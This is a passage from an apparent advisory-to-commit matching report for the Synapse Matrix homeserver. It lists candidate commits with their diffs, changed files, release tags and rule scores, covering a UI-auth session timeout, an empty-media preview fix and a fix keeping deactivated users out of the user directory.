- "+ \"dev2\",", - " 403,", - "@@ -348,2 +336,48 @@ class UIAuthTests(unittest.HomeserverTestCase):", - "+ @unittest.override_config({\"ui_auth\": {\"session_timeout\": 5 * 1000}})", - "+ def test_can_reuse_session(self):", - "+ \"\"\"", - "+ The session can be reused if configured.", - "+", - "+ Compare to test_cannot_change_uri.", - "+ \"\"\"", - "+ # Create a second and third login.", - "+ self.login(\"test\", self.user_pass, \"dev2\")", - "+ self.login(\"test\", self.user_pass, \"dev3\")", - "+", - "+ # Attempt to delete a device. This works since the user just logged in.", - "+ self.delete_device(self.user_tok, \"dev2\", 200)", - "+", - "+ # Move the clock forward past the validation timeout.", - "+ self.reactor.advance(6)", - "+", - "+ # Deleting another devices throws the user into UI auth.", - "+ channel = self.delete_device(self.user_tok, \"dev3\", 401)", - "+", - "+ # Grab the session", - "+ session = channel.json_body[\"session\"]", - "+ # Ensure that flows are what is expected.", - "+ self.assertIn({\"stages\": [\"m.login.password\"]}, channel.json_body[\"flows\"])", - "+", - "+ # Make another request providing the UI auth flow.", - "+ self.delete_device(", - "+ self.user_tok,", - "+ \"dev3\",", - "+ 200,", - "+ {", - "+ \"auth\": {", - "+ \"type\": \"m.login.password\",", - "+ \"identifier\": {\"type\": \"m.id.user\", \"user\": self.user},", - "+ \"password\": self.user_pass,", - "+ \"session\": session,", - "+ },", - "+ },", - "+ )", - "+", - "+ # Make another request, but try to delete the first device. This works", - "+ # due to re-using the previous session.", - "+ #", - "+ # Note that *no auth* information is provided, not even a session iD!", - "+ self.delete_device(self.user_tok, self.device_id, 200)", - "+", - " def test_does_not_offer_password_for_sso_user(self):", - "@@ -363,4 +397,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # and not password.", - "- device_ids = self.get_device_ids(self.user_tok)", - "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", - "+ channel = self.delete_device(self.user_tok, self.device_id, 401)", - "@@ -375,4 +408,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - "- device_ids = self.get_device_ids(self.user_tok)", - "- channel = self.delete_device(self.user_tok, device_ids[0], 401)", - "+ channel = self.delete_device(self.user_tok, self.device_id, 401)" - ], - "changed_files": [ - "changelog.d/8970.feature", - "docs/sample_config.yaml", - "synapse/config/_base.pyi", - "synapse/config/auth.py", - "synapse/config/homeserver.py", - "synapse/handlers/auth.py", - "synapse/rest/client/v2_alpha/account.py", - "synapse/storage/databases/main/registration.py", - "synapse/storage/databases/main/schema/delta/58/26access_token_last_validated.sql", - "tests/rest/client/v2_alpha/test_auth.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8970": "Remove unused last_used column from access_tokens table #8972 Merge Synapse release v1.31.0 into dinsic matrix-org/synapse-dinsic#97 Only allow skipping UI auth for certain actions. #10184" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8970, 8970", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: homeserver, server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8970", - "relevance": 2 - } - ] - }, - { - "commit_id": "1f3748f03398f8f91ec5121312aa79dd58306ec1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607353208, - "hunks": 13, - "message": "Do not raise a 500 exception when previewing empty media. (#8883)", - "diff": [ - "diff --git a/changelog.d/8883.bugfix b/changelog.d/8883.bugfix", - "new file mode 100644", - "index 000000000..6137fc5b2", - "--- /dev/null", - "+++ b/changelog.d/8883.bugfix", - "@@ -0,0 +1 @@", - "+Fix a 500 error when attempting to preview an empty HTML file.", - "diff --git a/synapse/rest/media/v1/preview_url_resource.py b/synapse/rest/media/v1/preview_url_resource.py", - "index dce6c4d16..1082389d9 100644", - "--- a/synapse/rest/media/v1/preview_url_resource.py", - "+++ b/synapse/rest/media/v1/preview_url_resource.py", - "@@ -678,3 +678,7 @@ class PreviewUrlResource(DirectServeJsonResource):", - "-def decode_and_calc_og(body, media_uri, request_encoding=None):", - "+def decode_and_calc_og(body, media_uri, request_encoding=None) -> Dict[str, str]:", - "+ # If there's no body, nothing useful is going to be found.", - "+ if not body:", - "+ return {}", - "+", - " from lxml import etree", - "diff --git a/tests/test_preview.py b/tests/test_preview.py", - "index 7f67ee9e1..a883d707d 100644", - "--- a/tests/test_preview.py", - "+++ b/tests/test_preview.py", - "@@ -58,3 +58,3 @@ class PreviewTestCase(unittest.TestCase):", - "- self.assertEquals(", - "+ self.assertEqual(", - " desc,", - "@@ -71,3 +71,3 @@ class PreviewTestCase(unittest.TestCase):", - "- self.assertEquals(", - "+ self.assertEqual(", - " desc,", - "@@ -98,3 +98,3 @@ class PreviewTestCase(unittest.TestCase):", - "- self.assertEquals(", - "+ self.assertEqual(", - " desc,", - "@@ -124,3 +124,3 @@ class PreviewTestCase(unittest.TestCase):", - " desc = summarize_paragraphs(example_paras, min_size=200, max_size=500)", - "- self.assertEquals(", - "+ self.assertEqual(", - " desc,", - "@@ -151,3 +151,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "@@ -166,3 +166,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "@@ -184,3 +184,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(", - "+ self.assertEqual(", - " og,", - "@@ -205,3 +205,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": \"Foo\", \"og:description\": \"Some text.\"})", - "@@ -218,3 +218,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", - "@@ -232,3 +232,3 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": \"Title\", \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": \"Title\", \"og:description\": \"Some text.\"})", - "@@ -246,2 +246,7 @@ class PreviewUrlTestCase(unittest.TestCase):", - "- self.assertEquals(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", - "+ self.assertEqual(og, {\"og:title\": None, \"og:description\": \"Some text.\"})", - "+", - "+ def test_empty(self):", - "+ html = \"\"", - "+ og = decode_and_calc_og(html, \"http://example.com/test.html\")", - "+ self.assertEqual(og, {})" - ], - "changed_files": [ - "changelog.d/8883.bugfix", - "synapse/rest/media/v1/preview_url_resource.py", - "tests/test_preview.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8883": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8883, 8883", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: resource", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8883", - "relevance": 2 - } - ] - }, - { - "commit_id": "651e1ae534c3cbe65d41115d8fb91bca08b22009", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608130381, - "hunks": 0, - "message": "Merge pull request #8946 from matrix-org/rav/refactor_send_request Remove `Request` return value from `make_request`", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8946": "Implement a username picker for synapse #8942 Fix UsersListTestCase #8964" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8946, 8946", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8946", - "relevance": 2 - } - ] - }, - { - "commit_id": "c07022303ef596fe7f42f6eb7001660a62801715", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608206739, - "hunks": 8, - "message": "Fix a bug that deactivated users appear in the directory (#8933) Fixes a bug that deactivated users appear in the directory when their profile information was updated. To change profile information of deactivated users is neccesary for example you will remove displayname or avatar. But they should not appear in directory. They are deactivated. Co-authored-by: Erik Johnston ", - "diff": [ - "diff --git a/changelog.d/8933.bugfix b/changelog.d/8933.bugfix", - "new file mode 100644", - "index 000000000..295933d6c", - "--- /dev/null", - "+++ b/changelog.d/8933.bugfix", - "@@ -0,0 +1 @@", - "+Fix a bug where deactivated users appeared in the user directory when their profile information was updated.", - "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", - "index 3d80371f0..7c4eeaaa5 100644", - "--- a/synapse/handlers/user_directory.py", - "+++ b/synapse/handlers/user_directory.py", - "@@ -115,5 +115,9 @@ class UserDirectoryHandler(StateDeltasHandler):", - " # the other changes.", - "- is_support = await self.store.is_support_user(user_id)", - "+", - " # Support users are for diagnostics and should not appear in the user directory.", - "- if not is_support:", - "+ is_support = await self.store.is_support_user(user_id)", - "+ # When change profile information of deactivated user it should not appear in the user directory.", - "+ is_deactivated = await self.store.get_user_deactivated_status(user_id)", - "+", - "+ if not (is_support or is_deactivated):", - " await self.store.update_profile_in_user_dir(", - "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", - "index 1260721db..9c886d671 100644", - "--- a/tests/handlers/test_user_directory.py", - "+++ b/tests/handlers/test_user_directory.py", - "@@ -56,2 +56,6 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", - " )", - "+ regular_user_id = \"@regular:test\"", - "+ self.get_success(", - "+ self.store.register_user(user_id=regular_user_id, password_hash=None)", - "+ )", - "@@ -65,3 +69,2 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", - " profile_info = ProfileInfo(avatar_url=\"avatar_url\", display_name=display_name)", - "- regular_user_id = \"@regular:test\"", - " self.get_success(", - "@@ -72,2 +75,37 @@ class UserDirectoryTestCase(unittest.HomeserverTestCase):", - "+ def test_handle_local_profile_change_with_deactivated_user(self):", - "+ # create user", - "+ r_user_id = \"@regular:test\"", - "+ self.get_success(", - "+ self.store.register_user(user_id=r_user_id, password_hash=None)", - "+ )", - "+", - "+ # update profile", - "+ display_name = \"Regular User\"", - "+ profile_info = ProfileInfo(avatar_url=\"avatar_url\", display_name=display_name)", - "+ self.get_success(", - "+ self.handler.handle_local_profile_change(r_user_id, profile_info)", - "+ )", - "+", - "+ # profile is in directory", - "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", - "+ self.assertTrue(profile[\"display_name\"] == display_name)", - "+", - "+ # deactivate user", - "+ self.get_success(self.store.set_user_deactivated_status(r_user_id, True))", - "+ self.get_success(self.handler.handle_user_deactivated(r_user_id))", - "+", - "+ # profile is not in directory", - "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", - "+ self.assertTrue(profile is None)", - "+", - "+ # update profile after deactivation", - "+ self.get_success(", - "+ self.handler.handle_local_profile_change(r_user_id, profile_info)", - "+ )", - "+", - "+ # profile is furthermore not in directory", - "+ profile = self.get_success(self.store.get_user_in_directory(r_user_id))", - "+ self.assertTrue(profile is None)", - "+", - " def test_handle_user_deactivated_support_user(self):", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index 4f379a5e5..9d6ef0251 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -605,3 +605,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "- self.other_user = self.register_user(\"user\", \"pass\")", - "+ self.other_user = self.register_user(\"user\", \"pass\", displayname=\"User\")", - " self.other_user_token = self.login(\"user\", \"pass\")", - "@@ -1014,2 +1014,50 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - "+ @override_config({\"user_directory\": {\"enabled\": True, \"search_all_users\": True}})", - "+ def test_change_name_deactivate_user_user_directory(self):", - "+ \"\"\"", - "+ Test change profile information of a deactivated user and", - "+ check that it does not appear in user directory", - "+ \"\"\"", - "+", - "+ # is in user directory", - "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", - "+ self.assertTrue(profile[\"display_name\"] == \"User\")", - "+", - "+ # Deactivate user", - "+ body = json.dumps({\"deactivated\": True})", - "+", - "+ request, channel = self.make_request(", - "+ \"PUT\",", - "+ self.url_other_user,", - "+ access_token=self.admin_user_tok,", - "+ content=body.encode(encoding=\"utf_8\"),", - "+ )", - "+", - "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+ self.assertEqual(\"@user:test\", channel.json_body[\"name\"])", - "+ self.assertEqual(True, channel.json_body[\"deactivated\"])", - "+", - "+ # is not in user directory", - "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", - "+ self.assertTrue(profile is None)", - "+", - "+ # Set new displayname user", - "+ body = json.dumps({\"displayname\": \"Foobar\"})", - "+", - "+ request, channel = self.make_request(", - "+ \"PUT\",", - "+ self.url_other_user,", - "+ access_token=self.admin_user_tok,", - "+ content=body.encode(encoding=\"utf_8\"),", - "+ )", - "+", - "+ self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", - "+ self.assertEqual(\"@user:test\", channel.json_body[\"name\"])", - "+ self.assertEqual(True, channel.json_body[\"deactivated\"])", - "+ self.assertEqual(\"Foobar\", channel.json_body[\"displayname\"])", - "+", - "+ # is not in user directory", - "+ profile = self.get_success(self.store.get_user_in_directory(self.other_user))", - "+ self.assertTrue(profile is None)", - "+", - " def test_reactivate_user(self):" - ], - "changed_files": [ - "changelog.d/8933.bugfix", - "synapse/handlers/user_directory.py", - "tests/handlers/test_user_directory.py", - "tests/rest/admin/test_user.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8933": "Fix UsersListTestCase #8964" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - 